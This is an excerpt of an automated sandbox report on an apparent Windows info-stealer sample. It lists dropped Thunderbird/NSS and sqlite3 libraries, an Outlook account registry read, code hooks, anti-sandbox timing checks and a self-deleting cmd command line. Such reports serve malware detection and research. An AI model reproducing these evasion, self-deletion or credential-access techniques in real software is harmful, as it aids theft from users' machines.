Source: sqlite3.dll.0.dr	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Creates mutexes

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Mutant created: \Sessions\1\BaseNamedObjects\user5L1M3_noturbusiness
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3460:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01

Might use command line arguments

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Command line argument: nq"

0_2_002270C0

Reads the hosts file

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Checks if Microsoft Office is installed

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager

Jump to behavior

Submission file is bigger than most known malware samples

Source: eLZzxG56uH.exe

Static file information: File size 4704768 > 1048576

PE file has a big raw section

Source: eLZzxG56uH.exe

Static PE information: Raw size of Intel Co is bigger than: 0x100000 < 0x43a000

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: eLZzxG56uH.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: freebl3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
Source:	Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: eLZzxG56uH.exe, 00000000.00000002.317091728.000000006EBC0000.00000002.00020000.sdmp, nss3.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
Source:	Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
Source:	Binary string: api-ms-win-core-memory-l1-1-0.pdb source: api-ms-win-core-memory-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: freebl3.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
Source:	Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr
Source:	Binary string: api-ms-win-core-profile-l1-1-0.pdb source: api-ms-win-core-profile-l1-1-0.dll.0.dr
Source:	Binary string: ucrtbase.pdbUGP source: ucrtbase.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdbUU source: ldap60.dll.0.dr
Source:	Binary string: api-ms-win-crt-time-l1-1-0.pdb source: api-ms-win-crt-time-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb66 source: nssckbi.dll.0.dr
Source:	Binary string: api-ms-win-core-handle-l1-1-0.pdb source: api-ms-win-core-handle-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-synch-l1-2-0.pdb source: api-ms-win-core-synch-l1-2-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: softokn3.dll.0.dr
Source:	Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: api-ms-win-core-processenvironment-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb<< source: IA2Marshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb source: eLZzxG56uH.exe, 00000000.00000002.316625537.000000006EAB9000.00000002.00020000.sdmp, mozglue.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\library\dummydll\qipcap.pdb source: qipcap.dll.0.dr
Source:	Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: api-ms-win-crt-conio-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-localization-l1-2-0.pdb source: api-ms-win-core-localization-l1-2-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-math-l1-1-0.pdb source: api-ms-win-crt-math-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: api-ms-win-core-processthreads-l1-1-1.dll.0.dr
Source:	Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: api-ms-win-core-namedpipe-l1-1-0.dll.0.dr
Source:	Binary string: vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: api-ms-win-crt-multibyte-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: api-ms-win-crt-utility-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapiDLL\mozMapi32.pdb source: mozMapi32.dll.0.dr
Source:	Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: api-ms-win-core-rtlsupport-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: api-ms-win-core-timezone-l1-1-0.dll.0.dr
Source:	Binary string: msvcp140.i386.pdbGCTL source: msvcp140.dll.0.dr
Source:	Binary string: api-ms-win-core-string-l1-1-0.pdb source: api-ms-win-core-string-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-file-l2-1-0.pdb source: api-ms-win-core-file-l2-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-process-l1-1-0.pdb source: api-ms-win-crt-process-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: api-ms-win-core-libraryloader-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldif\ldif60.pdb source: ldif60.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\config\external\lgpllibs\lgpllibs.pdb source: lgpllibs.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\msaa\AccessibleMarshal.pdb source: AccessibleMarshal.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: nssdbm3.dll.0.dr
Source:	Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: api-ms-win-core-interlocked-l1-1-0.dll.0.dr
Source:	Binary string: z:\task_1552562425\build\src\obj-thunderbird\toolkit\crashreporter\injector\breakpadinjector.pdb source: breakpadinjector.dll.0.dr
Source:	Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: api-ms-win-crt-heap-l1-1-0.dll.0.dr
Source:	Binary string: api-ms-win-crt-string-l1-1-0.pdb source: api-ms-win-crt-string-l1-1-0.dll.0.dr

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_00800100 push ebp; ret

0_2_00800117

PE file contains sections with non-standard names

Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: eLZzxG56uH.exe	Static PE information: section name: Intel Co
Source: sqlite3.dll.0.dr	Static PE information: section name: /4
Source: sqlite3.dll.0.dr	Static PE information: section name: /19
Source: sqlite3.dll.0.dr	Static PE information: section name: /31
Source: sqlite3.dll.0.dr	Static PE information: section name: /45
Source: sqlite3.dll.0.dr	Static PE information: section name: /57
Source: sqlite3.dll.0.dr	Static PE information: section name: /70
Source: sqlite3.dll.0.dr	Static PE information: section name: /81
Source: sqlite3.dll.0.dr	Static PE information: section name: /92
Source: AccessibleHandler.dll.0.dr	Static PE information: section name: .orpc
Source: AccessibleMarshal.dll.0.dr	Static PE information: section name: .orpc
Source: IA2Marshal.dll.0.dr	Static PE information: section name: .orpc
Source: lgpllibs.dll.0.dr	Static PE information: section name: .rodata
Source: MapiProxy.dll.0.dr	Static PE information: section name: .orpc
Source: MapiProxy_InUse.dll.0.dr	Static PE information: section name: .orpc
Source: mozglue.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001F49A2 LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_001F49A2

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: Intel Co

Binary contains a suspicious time stamp

Source: ucrtbase.dll.0.dr

Static PE information: 0x9E3394C7 [Sun Feb 8 16:22:31 2054 UTC]

Persistence and Installation Behavior:

Drops PE files

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\vcruntime140.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-1.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\prldap60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-math-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-time-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\breakpadinjector.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processthreads-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ucrtbase.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nss3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-string-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-environment-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-process-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-sysinfo-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-stdio-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-rtlsupport-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-profile-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\libEGL.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozglue.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssckbi.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldap60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\ldif60.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-processenvironment-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-runtime-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-timezone-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-2-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-heap-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-filesystem-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\sqlite3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-multibyte-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\msvcp140.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-util-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-string-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	File created: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll			Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1530005 value: E9 FB BF 0E 76			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7761C000 value: E9 0A 40 F1 89			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1540008 value: E9 AB E0 11 76			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7765E0B0 value: E9 60 1F EE 89			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 1670005 value: E9 CB 5A 29 75			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 76905AD0 value: E9 3A A5 D6 8A			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3220005 value: E9 5B B0 70 73			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7692B060 value: E9 AA 4F 8F 8C			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3230005 value: E9 DB F8 31 71			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 7454F8E0 value: E9 2A 07 CE 8E			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 3240005 value: E9 FB 42 33 71			Jump to behavior
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Memory written: PID: 3340 base: 74574300 value: E9 0A BD CC 8E			Jump to behavior

Self deletion via cmd delete

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Process created: cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q 'C:\Users\user\Desktop\eLZzxG56uH.exe'			Jump to behavior

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\Desktop\eLZzxG56uH.exe

Code function: 0_2_001E06DD __EH_prolog,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_001E06DD

Malware Analysis System Evasion:

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp	Binary or memory string: SBIEDLL.DLL
Source: eLZzxG56uH.exe, 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp	Binary or memory string: SBIEDLL.DLL6

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	RDTSC instruction interceptor: First address: 000000000067BEBE second address: 000000000067BEC7 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	RDTSC instruction interceptor: First address: 000000000049A2ED second address: 000000000049A2F6 instructions: 0x00000000 rdtsc 0x00000002 cwde 0x00000003 inc cl 0x00000005 ror cl, 1 0x00000007 mov al, dl 0x00000009 rdtsc

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\Desktop\eLZzxG56uH.exe TID: 4840	Thread sleep time: -150000s >= -30000s			Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 5348	Thread sleep count: 72 > 30			Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Found dropped PE file which has not been started or loaded

Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-synch-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-utility-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\nssdbm3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\softokn3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-conio-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-convert-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\freebl3.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-private-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\mozMapi32_InUse.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\qipcap.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-crt-locale-l1-1-0.dll			Jump to dropped file
Source: C:\Users\user\Desktop\eLZzxG56uH.exe	Dropped PE file which has not been started: C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\lgpllibs.dll			Jump to dropped file
